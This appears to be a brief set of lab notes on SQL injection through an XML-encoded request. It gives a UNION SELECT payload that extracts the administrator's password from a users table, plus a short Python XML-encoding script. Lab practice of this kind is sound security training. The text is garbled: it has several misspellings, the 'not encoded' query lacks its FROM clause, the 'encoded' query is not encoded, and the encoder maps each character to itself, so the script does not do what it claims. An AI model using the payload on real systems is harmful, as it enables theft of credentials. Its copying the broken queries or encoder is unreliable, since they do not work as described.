1.4 KiB
1.4 KiB
XML
Steps
-
Capture the request from BrupSuite (displaying some sort of XML)
-
Find the number of column (You can simply guest from the output of the original request)
-
trying to bypass some filter, you might see that simply encoding the request (URL might not work, this is because XML use a specific encoding (More information ---> HERE))
- Also, here we are trying to encode character (this is different then simple url encoding)
- Using (HARACTER;), we can see that SQL injection is valid
Query Example
#Not Encoded
4 UNION SELECT password WHERE username='administator'--
$Encoded
4 UNION SELECT password FROM users WHERE username='administrator'-- 
Tool (Python)
XML encoder (Possible to modify it to encode character)
import xml.sax.saxutils
# Define the string to be encoded
string = "this is a string to be XML encoded"
# Encode the string using the escape() method
encoded_string = xml.sax.saxutils.escape(string, {
"'": "'", # Single quote
'"': """, # Double quote
"&": "&", # Ampersand
"<": "<", # Less than
">": ">", # Greater than
" ": " " # Space
})
# Print the encoded string
print(encoded_string)